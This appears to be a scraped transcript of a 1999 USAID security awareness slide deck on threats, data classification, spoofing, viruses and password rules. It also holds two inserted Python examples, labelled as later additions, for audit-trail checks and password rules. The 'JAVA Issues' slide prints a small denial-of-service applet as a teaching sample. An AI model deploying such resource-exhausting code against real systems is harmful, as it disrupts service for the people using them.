information security user awareness training 1999 by bill cleveland
Post on 18-Dec-2015
![Page 1: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/1.jpg)
Information Security
USER AWARENESS TRAINING
1999
by Bill Cleveland
![Page 2: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/2.jpg)
INFORMATION SECURITY STAFF
USAID Information Systems Security Officer: Jim Craft <[email protected]> (202) 712-4559
Senior Security Consultants: Mike Fuksa <[email protected]> (202) 712-1096; Ante Penaso <[email protected]> (703) 465-7008
Security Training and Awareness Consultant: Bill Cleveland <[email protected]> (703) 465-7054
![Page 3: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/3.jpg)
BRIEFING OBJECTIVES
AIS SECURITY
- Why is it important?
- What is Automated Information Security / Computer Security?
- Current Issues (Threats/Vulnerabilities/Countermeasures)
- Contingency Planning
- Conclusion
- Open Discussion
![Page 4: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/4.jpg)
Information Security
Why is it important?
![Page 5: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/5.jpg)
COMPUTER SECURITY
Definition - Measures required to protect against unauthorized (accidental or intentional) disclosure, modification or destruction of Automated Information Systems, networks and computer resources, or denial of service to process data.
![Page 6: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/6.jpg)
NUMBER ONE
- We are a computerized society
- Nearly everything we do utilizes computers
- How much data do you maintain that isn’t contained on a computer somewhere?
- All computers are vulnerable
![Page 7: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/7.jpg)
NUMBER TWO
Much of what we compromise is done through unclassified open source publications, conventions, consortiums, patents, etc.
All this tied together provides a pretty complete paint-by-the-numbers picture.
![Page 8: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/8.jpg)
IN THE PAST, FEW COMPUTERS WERE AVAILABLE, AND ONLY SPECIALISTS COULD USE THEM
![Page 9: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/9.jpg)
TODAY, COMPUTERS ARE COMMON EQUIPMENT, AND (ALMOST) ANYONE CAN USE THEM...
![Page 10: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/10.jpg)
HEADLINE SECURITY STORIES
Security Breaches Up Dramatically on Milnet
By Florence Gore
Army, Navy, Air Force and Defense Department
Youths charged in computer plot
CHICAGO - Two high school juniors from suburban Palatine have
6,000 Computer Security Breaches Detailed in Agriculture Dept. Report
by Robert Pear
Washington Star Staff Writer
Agriculture Department procedures and data files containing large amounts of sensitive information, including the names of persons who received government checks were breached to the
Marines Faulted Over Care of Secrets
By Neil Roland
United Press International
Sensitive unclassified and classified material could go undetected, auditors found. Auditors did not say they had found instances of espionage. But the report said Marine Corps personnel sometimes granted civilian contractors access to classified documents even though the civilians needed security clearances. Maj Ron Stokes, a
Peace Activist Found Guilty of Wrecking DoD Computer
By Eric Fredell
Special to GCN
Some computers just ask for a good whacking. In June at Vandenburg Air Force Base in California a peace activist was found destroying a computer. She gave it a right with a
![Page 11: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/11.jpg)
Security becomes more and more work, as we all are learning.....
![Page 12: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/12.jpg)
WHAT IS AIS SECURITY / COMPUTER SECURITY?
![Page 13: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/13.jpg)
AIS Security
Provides a reasonable level of protection against destruction or partial destruction of your computer systems that could result in partial or total denial of services to the system users.
The Protection of data and software from unauthorized access.
![Page 14: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/14.jpg)
AIS SECURITY PERTAINS TO -
- Physical
- Personnel
- Hardware
- Software
- Communications
- Emanations
- Administrative/Operations
- Data/Information
![Page 15: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/15.jpg)
PHYSICAL SECURITY
Physical security is that part of security concerned with physical measures designed to safeguard personnel, to prevent unauthorized access to equipment, installations, material, and documents, and theft. Physical security and AIS security go hand in hand.
![Page 16: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/16.jpg)
AIS SECURITY IS COMPLEX
[Diagram labels: AIS SECURITY, INFOSEC, TEMPEST, COMSEC, ADMIN, PHYSICAL, HARDWARE, SOFTWARE, PERSONNEL]
![Page 17: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/17.jpg)
IS SYSTEM = HARDWARE + FACILITIES + PEOPLE + SOFTWARE / DATA
![Page 18: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/18.jpg)
WHY INFORMATION SECURITY?
Mission Cost Data/Software Dependence
![Page 19: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/19.jpg)
WHY -
Two Reasons:
- It makes sense
- It’s the law
![Page 20: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/20.jpg)
COMPUTER SECURITY IS EVERYONE’S RESPONSIBILITY
Cooperation and support from all personnel throughout the activity is an essential key to a successful program!
End User Supervisors
New Employees
End Users
![Page 21: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/21.jpg)
DATA CLASSIFICATIONS
- CLASSIFIED (CONFIDENTIAL, SECRET, TOP SECRET)
- SENSITIVE BUT UNCLASSIFIED (TECHNICAL, PROPRIETARY, PROGRAM SPECIFIC)
- UNCLASSIFIED
![Page 22: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/22.jpg)
DATA CLASSIFICATION: CLASSIFIED
Confidential - Secret - Top Secret
To Access Classified Material:
- Appropriate Clearance Level
- Need-to-Know
- Access Approval
Special Handling and Storage Requirements:
- Magnetic media may not be shredded, only burned or degaussed by an approved degausser (TS may only be destroyed)
![Page 23: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/23.jpg)
CLASSIFIED PROCESSING
Unless your computer has been certified by NSA as meeting the trusted computer base criteria for B2 certification (secure multi-level mode), as soon as you introduce classified data into your system, all data on all media and devices associated with the system is classified at the highest level of data contained on the system.
The system and all of its data (100%) remain classified at that level until the system has been sanitized (declassified) by use of approved methods.
![Page 30: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/30.jpg)
DATA CLASSIFICATION: SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
- Financial / Payroll Information
- Proprietary Information
![Page 35: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/35.jpg)
DATA CLASSIFICATION: SENSITIVE BUT UNCLASSIFIED (Cont.)
Requires Special Handling, Storage and Destruction
- If kept on desk, turn over or store in desk, file cabinet or notebook
- Destruction must be done in such a way to prevent reconstruction.
OOPS, DROPSIES
![Page 36: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/36.jpg)
CURRENT ISSUES
THREATS / VULNERABILITIES / COUNTERMEASURES
![Page 37: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/37.jpg)
THREATS
- An activity, deliberate or unintentional, with the potential for causing harm to an Automated Information System
- Manifestation of a threat results in degraded mission accomplishment
- Threat identification includes both known threats and reliably postulated threats. Lack of evidence does not rule out the existence of a threat
![Page 38: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/38.jpg)
CATEGORIES OF THREATS
NATURAL - Hurricane, Fire, Flood, Earthquake
Man-Made - Intentional Viruses, Espionage, Sharing Passwords, Inadequate Backups
Unintentional - Accidental Power loss, Forgetting Password, Unattended Terminal Display, Food/Drinks
![Page 39: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/39.jpg)
SOME AIS SECURITY THREATS
- Fire
- Flood / Water Damage
- Wind Damage
- Snow / Ice Storms
- Power Loss
- Unauthorized Access
- Espionage
- Food / Drinks
![Page 40: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/40.jpg)
SOME AIS SECURITY THREATS
- Sabotage
- Unauthorized Software / Data Modification
- System / Application Programmer Errors
- Operator/User Errors and Omissions
- Communications Failure
- Fraud and Abuse
![Page 41: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/41.jpg)
JAVA Issues
Denial of service
![Page 42: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/42.jpg)
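    import java.applet.*;
    import java.awt.*;

    // Denial-of-service applet: the loop below has no exit condition.
    public class InfiniteThreads extends Applet implements Runnable
    {
        Thread wasteResources = null;
        boolean StopThreads = false;   // never set to true

        public void run ()
        {
            while (!StopThreads)
            {
                // Each pass allocates another Thread wrapping this same Runnable...
                wasteResources = new Thread(this);
                wasteResources.setPriority(Thread.MAX_PRIORITY);
                // ...and run() (not start()) re-enters this method on the calling thread.
                wasteResources.run();
            }
        }
    }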
![Page 43: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/43.jpg)
Web Spoofing
- Easy to do
- Spectacular effect
- Impossible to prevent
- Pre-warned is Pre-armed!!!!!
![Page 44: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/44.jpg)
E-mail Spoofing
- Forge a false e-mail
- Easy to do
- Impossible to prevent
- Authenticate
- Sign internal messages
![Page 45: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/45.jpg)
Social Engineering
- Easy to do
- Easy to prevent
- Don’t share passwords
Userid: mreiter
password: mreiter
Share my System!
WRONG!
![Page 46: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/46.jpg)
COMPUTER VIOLATIONS, FRAUD, AND ABUSE
70 - 80% of annual loss related to computers is committed by employees
20% of the total computer-related loss is committed by disgruntled employees
60% of the total computer-related loss is caused through human errors or accidents
FLASH
Disgruntled employee sabotages classified AIS Systems
15 Computers have been destroyed by negligence
No one here would ever do that! Would they?
![Page 47: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/47.jpg)
THREATS: IMPACTS ON COMPUTER RESOURCES
- Destruction
- Modification
- Disclosure
- Denial of Service
How will I ever get my work done now!!!!!!
![Page 48: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/48.jpg)
THREAT - VIRUS
Virus - run antivirus programs on a regular basis.
Do not use any outside floppies/disks on your system without running a virus scan first. Many viruses are introduced because virus scanning was not performed.
No illegal duplication of S/W rule - this reduces the spread of viruses and avoids legal headaches
DR. NEAT GAMESCAN
![Page 49: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/49.jpg)
VULNERABILITY
A vulnerability is a flaw or weakness that may be exploited by a threat agent to cause harm to an AIS system or network.
![Page 50: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/50.jpg)
SOME VULNERABILITIES
- Open Building / Room Policy
- Disgruntled Employees
- Lack of Security Awareness
- Inadequate Supervision
- Software / Hardware
![Page 51: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/51.jpg)
THREAT / VULNERABILITY
Data Alteration, Outside Access - This is why audit trails are so important. An audit trail lets you check data processing against tasking and logged computer time for suspicious discrepancies.
In the case where Laptops/portables are used by multiple users, keep a written log of who checked it out and when it was returned.
[Sample checkout log: Toshiba, Laptop, MINOR 109999; columns: NAME, DATE]
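The audit-trail check described on this slide, as an added example that is not part of the original briefing: it totals logged computer time per user and system and compares it with tasking. The log format, the tasking table, the finding names and the half-hour tolerance are all assumptions, and the sample records are constructed.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample data (not from the briefing).
# Tasking: (user, system) -> hours of processing assigned for the period.
TASKING = {
    ("jdoe", "PAYROLL"): 6.0,
    ("asmith", "PAYROLL"): 4.0,
    ("asmith", "BUDGET"): 2.0,
}

# Audit trail, one session per line: user, system, login time, logout time.
AUDIT_LOG = """\
jdoe   PAYROLL 1999-03-01T09:00 1999-03-01T12:00
jdoe   PAYROLL 1999-03-02T09:00 1999-03-02T11:30
asmith PAYROLL 1999-03-01T13:00 1999-03-01T16:00
asmith PAYROLL 1999-03-02T22:00 1999-03-03T03:00
asmith BUDGET  1999-03-03T10:00 1999-03-03T11:00
bjones BUDGET  1999-03-03T19:00 1999-03-03T19:45
jdoe   PAYROLL 1999-03-04T14:00 1999-03-04T13:00
"""

FMT = "%Y-%m-%dT%H:%M"


def parse_sessions(text):
    """Return (sessions, bad_lines); a session is (user, system, hours)."""
    sessions, bad = [], []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if not parts:
            continue
        try:
            user, system, t_in, t_out = parts
            start = datetime.strptime(t_in, FMT)
            end = datetime.strptime(t_out, FMT)
        except ValueError:
            bad.append((n, line))      # wrong field count or unparsable time
            continue
        if end <= start:
            bad.append((n, line))      # logout before login: record is suspect
            continue
        hours = (end - start).total_seconds() / 3600
        sessions.append((user, system, hours))
    return sessions, bad


def reconcile(tasking, sessions, tolerance=0.5):
    """Compare logged hours with tasked hours and list the discrepancies."""
    logged = defaultdict(float)
    for user, system, hours in sessions:
        logged[(user, system)] += hours

    findings = []
    for key, hours in sorted(logged.items()):
        if key not in tasking:
            # Computer time with no tasking behind it.
            findings.append(("NO_TASKING", *key, round(hours, 2)))
        elif hours > tasking[key] + tolerance:
            # More computer time than the tasking accounts for.
            findings.append(("OVER_TASKING", *key, round(hours - tasking[key], 2)))
    for key in sorted(set(tasking) - set(logged)):
        # Tasked work that left no trace in the audit trail.
        findings.append(("NO_ACTIVITY", *key, tasking[key]))
    return findings


if __name__ == "__main__":
    sessions, bad = parse_sessions(AUDIT_LOG)
    for n, line in bad:
        print(f"line {n}: unusable record: {line}")
    for finding in reconcile(TASKING, sessions):
        print(finding)
```
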
![Page 52: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/52.jpg)
THREAT / VULNERABILITY RELATIONSHIP
Sabotage (Threat)
Possible Vulnerabilities:
- Disgruntled Employee(s)
- Activists / Protesters
- Inadequate Building Access Control
Hey man, this base is great! Not too many guards and the shoreline and many buildings are open. This place is easy!
Alert our protest group, we’re on tonight.
![Page 53: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/53.jpg)
SAFEGUARDS / COUNTERMEASURES
Any action, device, procedure, technique or other measure that reduces the vulnerability of a system.
Examples:
Security Operating Procedures
Fire/Smoke Alarms
Intrusion Detection System
Firewall
Awareness Training
![Page 54: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/54.jpg)
IN CONCLUSION
I John Walker have received my annual Security Briefing
SECURITY BRIEFING
![Page 55: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/55.jpg)
COMMON STATEMENTS #1
Aw come on, It’s only a Personal Computer
![Page 56: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/56.jpg)
It’s-Only-a-Personal-Computer Facts
But It Still Requires Safeguarding
Many have more capacity and capabilities than some of the mainframes in our inventory.
The only small features are their physical size, the cost, and their security features.
![Page 57: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/57.jpg)
COMMON STATEMENTS #2
WE HAVE TO TRUST OUR PEOPLE...
Hi, I downloaded those programs from my PC like you wanted. I’m at my car getting ready to drive over now. See you soon.
I see a computer, tell me the password so I can check it for you
![Page 58: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/58.jpg)
WE HAVE TO TRUST OUR PEOPLE
We like to think we can - but always remember to check on and report suspicious activities
Be on the lookout for people who you do not recognize in your environment.
If you see persons without badges, challenge them.
If you hear someone talking about things they shouldn’t be, let them know. If they continue, report it.
![Page 59: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/59.jpg)
COMMON STATEMENT #3
We Only Process Unclassified On Our PC’s.....
![Page 60: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/60.jpg)
WE ONLY PROCESS UNCLASSIFIED ON OUR PC’s....
However, if it’s private information, it is considered SENSITIVE BUT UNCLASSIFIED and must be treated as such.
If your system is accredited for Unclassified, that is all that you’re allowed to process. You must be accredited for classified processing in order to use your computer for classified work.
Software Trouble Report
![Page 61: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/61.jpg)
OPEN DISCUSSION
![Page 62: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/62.jpg)
Yeah, it really got to him!
![Page 63: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/63.jpg)
SECURITY POP QUIZ
![Page 64: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/64.jpg)
WHAT’S WRONG HERE?
BE
![Page 65: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/65.jpg)
WHAT’S THE PROBLEM HERE??
P3D4Oh$
![Page 66: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/66.jpg)
PASSWORD DON’TS:
DO NOT USE ANY PERSONAL NAMES, NICKNAMES, PLACES, BIRTHDAYS, ETC FOR YOUR PASSWORD.
DO NOT USE ANYTHING THAT CAN BE TRACED BACK TO YOU (E.G. AUTO LICENSE NUMBER, BANK ACCOUNT NUMBERS, ANNIVERSARY DATE).
DO NOT USE ANYTHING THAT HAS TO DO WITH YOUR PROFESSION (E.G. JOB TITLE, DEGREE, ETC.).
DO NOT USE THE SAME PASSWORD FOR ALL SYSTEMS.
PASSWORD DO’S:
USE CHARACTERS WITH NUMBERS AND PUNCTUATION.
INTERSPERSE CAPITALS WITH LOWER CASE (EX: Aih4B/3).
DO USE, IF POSSIBLE, AT LEAST SEVEN CHARACTERS IN YOUR PASSWORD.
DO CHANGE YOUR PASSWORD REGULARLY.
**REMEMBER - IF YOU SUSPECT YOUR PASSWORD HAS BEEN COMPROMISED - REPORT IT IMMEDIATELY TO A SYSTEM ADMINISTRATOR.
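The DO's and DON'Ts above expressed as a checker, as an added example that is not part of the original briefing. The function and parameter names are hypothetical, and the look-alike substitution step (catching a user ID disguised with digits and symbols) goes beyond what the slide states.

```python
import string

MIN_LENGTH = 7  # "at least seven characters"

# Assumption: common digit/symbol stand-ins are folded back to letters so that
# a disguised name or user ID is still recognised as traceable.
_LOOKALIKES = str.maketrans("013457@$!", "oieastasi")


def _normalise(text):
    return text.lower().translate(_LOOKALIKES)


def check_password(password, userid="", personal_terms=(),
                   other_system_passwords=()):
    """Return the list of rules the password breaks (empty list = passes).

    personal_terms: names, nicknames, places, dates, plate numbers, job title
    and similar items supplied by the caller for this user.
    other_system_passwords: passwords the user already has on other systems.
    """
    problems = []

    # PASSWORD DO'S
    if len(password) < MIN_LENGTH:
        problems.append("shorter than seven characters")
    has_lower = any(c.islower() for c in password)
    has_upper = any(c.isupper() for c in password)
    if not (has_lower and has_upper):
        problems.append("does not mix capitals with lower case")
    if not any(c.isdigit() for c in password):
        problems.append("no numbers")
    if not any(c in string.punctuation for c in password):
        problems.append("no punctuation")

    # PASSWORD DON'TS
    folded = _normalise(password)
    for term in [userid, *personal_terms]:
        # Very short terms would match by accident, so they are skipped.
        if len(term) >= 3 and _normalise(term) in folded:
            problems.append(f"contains traceable term {term!r}")
    if password in other_system_passwords:
        problems.append("same password used on another system")

    return problems


if __name__ == "__main__":
    # Values below come from the slides: the shared "mreiter" account and
    # the example password "Aih4B/3".
    for candidate in ("mreiter", "Mr31ter!", "Aih4B/3"):
        print(candidate, "->", check_password(candidate, userid="mreiter") or "OK")
```
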
![Page 67: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/67.jpg)
WHAT’S WRONG HERE?
SODA
Visitor Escort Req’d
![Page 68: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/68.jpg)
Protect Your Equipment
You should always try to protect your equipment from situations that can cause damage, e.g. extreme heat, smoke, a leaky roof, etc.
Do not drink or eat around your equipment. Many keyboards have had to be replaced due to drinks being spilled. (If a computer system is on your desk, please keep any food or drink away from it.)
When working on classified, protect your screen from unauthorized viewing.
Virus prevention: install and run an anti-virus program often. Do not use any “foreign” magnetic media without running a virus scan on it first.
![Page 69: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/69.jpg)
WHAT’S WRONG HERE?
Check out the neat software I brought in. My friend gave it to me. He got it at work. He said it hasn’t got a virus on it, so we don’t need to scan it.
COOL, LET’S RUN IT!
![Page 70: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/70.jpg)
Copyrighted, Licensed or Proprietary Information/Downloading Files:
When downloading files from the Internet for use in official business, there are legal considerations, as well as concerns such as the introduction of viruses, bugs or other ill effects.
Registration cannot be required with the understanding that it may be used for commercial purposes. In particular, the Government may not be later identified as a user of the s/w or otherwise presented as endorsing the program.
S/W download must not obligate the Government to provide anything in return. In the case of beta software, there cannot be any requirement for the Government to submit an evaluation report in return for the download.
Registration cannot be required with any expectation that the Government may later be obligated to purchase a copy of the s/w.
Finally, where registration causes terms for nondisclosure and use of the s/w, the downloader must take care not to breach any of its
![Page 71: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/71.jpg)
Copyrighted, Licensed or Proprietary Information/Downloading Files: (CONTINUED)
terms. (For example - in situations where a program is found to be beneficial, the s/w may not be simply duplicated and distributed to others if registration is required from each individual user. On the other hand, if a program is found not to be of use, the downloader must take appropriate steps to remove and/or destroy the s/w.)
All users who download files for PC access should have a virus scan run prior to usage.
Remember to run a virus scan on disks and floppies received from outside our Department. Many viruses have been passed from Department to Department because no one ran a virus scan. If you need assistance, contact the ISSO or Asst. ISSO.
And don’t forget that use of LANs to domains outside is for Official Business Only. This is a monitored service, and any misuse is subject to disciplinary action or loss of access.
![Page 72: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/72.jpg)
F I N I T O
It’s Over
Fertig
(Please go back to work now. No running please, single file, no pushing or shoving. Yes, you may hold hands with the one behind you. Don’t try to be the first one out if it requires pushing someone else out of your way. Take nothing but the knowledge with you, leave nothing but empty seats. Thank you very much. That’s all I can say, so have a nice day.)